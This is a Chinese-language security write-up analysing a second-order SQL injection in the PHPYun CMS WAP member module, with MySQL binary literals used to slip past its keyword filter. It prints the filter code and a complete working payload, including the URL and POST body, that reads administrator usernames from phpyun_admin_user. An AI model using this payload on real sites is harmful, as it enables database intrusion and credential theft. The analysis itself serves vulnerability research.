漏洞说明

这个漏洞涉及到了mysql中比较有意思的两个知识点以及以table作为二次注入的突破口，非常的有意思。此cms的防注入虽然是很变态的，但是却可以利用mysql的这两个特点绕过防御。本次的漏洞是出现在ndex.class.php中的likejob_action()和saveresumeson_action()函数，由于这两个函数对用户的输入没有进行严格的显示，同时利用mysql的特点能够绕过waf。

PS:此漏洞的触发需要在WAP环境下，所以在进行调试的时候需要修改浏览器的ua为Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Mobile Safari/537.36。

 

漏洞分析

mysql特点

特点1

传统的插入方式可能大家想到的都是insert into test(id,content,title) values(1,'hello','hello')。如果我们仅仅值需要插入一条记录，则使用insert into test(content) values('hello2')。如下图所示:

但是实际上还存在另外一种方式能够仅仅值插入一条记录。

insert into test set content='hello3';

可以看到这种方式和insert into test(content) values('hello2')是一样的。

说明插入数据时，利用values()和通过=指定列的方式结果都一样

特点2

我们知道mysql中能够使用十六进制表示字符串。如下：

其中0x68656c6c6f表示的就是hello。这是一个很常见的方式。

除了使用十六进制外，还可以使用二进制的方式进行插入。hello的二进制是01101000 01100101 01101100 01101100 01101111，那么我们的SQL语句还可以这样写,insert into test set content=0b0110100001100101011011000110110001101111。这种方式和insert into test(content) values (0b0110100001100101011011000110110001101111)是一样的。

mysql不仅可以使用十六进制插入，还可以使用二进制的方式插入

waf防护分析

waf的防护是位于config/db.safety.php

其中的gpc2sql()过滤代码如下:

function gpc2sql($str, $str2) {
    if (preg_match("/select|insert|update|delete|load_file|outfile/is", $str)) {
        exit(safe_pape());
    }
    if (preg_match("/select|insert|update|delete|load_file|outfile/is", $str2)) {
        exit(safe_pape());
    }
    $arr = array("sleep" => "Ｓleep", " and " => " an d ", " or " => " Ｏr ", "xor" => "xＯr", "%20" => " ", "select" => "Ｓelect", "update" => "Ｕpdate", "count" => "Ｃount", "chr" => "Ｃhr", "truncate" => "Ｔruncate", "union" => "Ｕnion", "delete" => "Ｄelete", "insert" => "Ｉnsert", """ => "“", "'" => "“", "--" => "- -", "(" => "（", ")" => "）", "00000000" => "OOOOOOOO", "0x" => "Ox");
    foreach ($arr as $key => $v) {
        $str = preg_replace('/' . $key . '/isU', $v, $str);
    }
    return $str;
}

可以看到将0x替换为了Ox,所以无法传入十六进制，但是我们却可以利用mysql中的二进制的特点，利用0b的方式传入我们需要的payload。

index.class.php漏洞分析

漏洞是位于wap/member/model/index.class.php中，漏洞产生的主要函数是位于likejob_action()和saveresumeson_action()中。我们首先分析likejob_action()。likejob_action()的主要代码如下：

而DB_update_all()的代码如下：

function DB_update_all($tablename, $value, $where = 1,$pecial=''){
    if($pecial!=$tablename){

        $where =$this->site_fetchsql($where,$tablename);
    } 
    $SQL = "UPDATE `" . $this->def . $tablename . "` SET $value WHERE ".$where; 
    $this->db->query("set sql_mode=''");
    $return=$this->db->query($SQL);
    return $return;
}

也就是说，当数据进入到DB_update_all()之后就不会有任何的过滤。那么漏洞点就在于resume_expect中的job_classid字段。job_classid字段的内容的传递如下图所示：

所以如如果我们控制了resume_expect中的job_classid字段，我们就能够修改这条语句了。

我们可以借助于saveresumeson_action()来向job_classid中插入我们的payload。saveresumeson_action()的关键代码如下：

可以看到$table是直接通过"resume_".$_POST['table']拼接的，这也就以为着$table是我们可控的，之后$table进入了$this->obj->update_once()中。我们进入uptate_once()中：

$table变量在update_once()没有进行任何的处理，直接进入到DB_update_all()中，我们追踪进入到DB_update_all()中:

同样没有进行任何的处理。

通过上面的跟踪分析，表明$table="resume_".$_POST['table'];赋值之后，中途$table变量没有进行任何的过滤直接进入了最终的SQL语句查询。

如此整个攻击链就成功了，我们通过saveresumeson_action()中的$table可控,对resume_expect中的job_classid进行修改，之后通过likejob_action()读取job_classid字段的内容，执行我们的SQL语句。

由于我们无法使用十六进制，此时我们就需要使用到二进制(0b)插入我们的payload。

 

漏洞复现

注册用户/创建简历

注册用户创建简历。此时在phpyun_resume_expect中存在一条id=1的记录。

访问saveresumeson

我们访问saveresumeson对应的URL，写入我们的payload。根据语法，我们需要将table的内容设置为

expect' set class_id=1))/**/union/**/select/**/1,username,3,4,5,6,7,8,9,10,11,12/**/from/**/phpyun_admin_user #,uid=1 #

由于1))/**/union/**/select/**/1,username,3,4,5,6,7,8,9,10,11,12/**/from/**/phpyun_admin_user #无法绕过SQL的防御，需要转化为二进制，是001100010010100100101001001011110010101000101010001011110111010101101110011010010110111101101110001011110010101000101010001011110111001101100101011011000110010101100011011101000010111100101010001010100010111100110001001011000111010101110011011001010111001001101110011000010110110101100101001011000011001100101100001101000010110000110101001011000011011000101100001101110010110000111000001011000011100100101100001100010011000000101100001100010011000100101100001100010011001000101111001010100010101000101111011001100111001001101111011011010010111100101010001010100010111101110000011010000111000001111001011101010110111001011111011000010110010001101101011010010110111001011111011101010111001101100101011100100010000000100011

那么最终的payload是:

URL:http://localhost/wap//member/index.php?c=saveresumeson&eid=1
POST：name=java%e5%a4%a7%e6%95%b0%e6%8d%ae%e5%bc%80%e5%8f%91&sdate=2018-02&edate=2018-03&title=%e6%a0%b8%e5%bf%83%e5%bc%80%e5%8f%91%e4%ba%ba%e5%91%98&content=java%e5%a4%a7%e6%95%b0%e6%8d%ae%e5%ba%93%e5%bc%80%e5%8f%91&eid=1&id=&submit=%e4%bf%9d%e5%ad%98&table=expect%60set+job_classid%3d0b0011000100101001001010010010111100101010001010100010111101110101011011100110100101101111011011100010111100101010001010100010111101110011011001010110110001100101011000110111010000101111001010100010101000101111001100010010110001110101011100110110010101110010011011100110000101101101011001010010110000110011001011000011010000101100001101010010110000110110001011000011011100101100001110000010110000111001001011000011000100110000001011000011000100110001001011000011000100110010001011110010101000101010001011110110011001110010011011110110110100101111001010100010101000101111011100000110100001110000011110010111010101101110010111110110000101100100011011010110100101101110010111110111010101110011011001010111001000100011%2cuid%3d1+%23

此时我们执行的SQL语句是:

INSERT INTO `phpyun_resume_expect`set job_classid=0b001100010010100100101001001011110010101000101010001011110111010101101110011010010110111101101110001011110010101000101010001011110111001101100101011011000110010101100011011101000010111100101010001010100010111100110001001011000111010101110011011001010111001001101110011000010110110101100101001011000011001100101100001101000010110000110101001011000011011000101100001101110010110000111000001011000011100100101100001100010011000000101100001100010011000100101100001100010011001000101111001010100010101000101111011001100111001001101111011011010010111100101010001010100010111101110000011010000111000001111001011101010110111001011111011000010110010001101101011010010110111001011111011101010111001101100101011100100010000000100011,uid=1 #` SET

最终数据库中多了一条记录，如下：

我们顺利地向job_classid中插入了我们的的payload

访问likejob_action触发payload

接下来我们访问http://localhost/member/index.php?c=likejob&id=7，其中的id就是刚刚我们插入的payload所对应记录的id。当运行至DB_select_all()中执行的SQL语句是：

为了便于分析，我们将这条SQL语句放入到datagrid中分析:

最终在页面上显示admin的信息。

至此整个漏洞都分析完毕了。

 

总结

一般来说，二次注入利用点一般都比较隐晦。所以二次注入的思路比一般的注入更加巧妙和有意思，在本例中体现得尤为明显。

1. 这个二次注入的点比较难找，二次注入中的利用table作为二次注入的利用点的例子还是比较少见的；
2. 绕过方法也比较少见。本例中的waf的防护还是比较严格的，利用了mysql的两个少见特性就可以绕过了。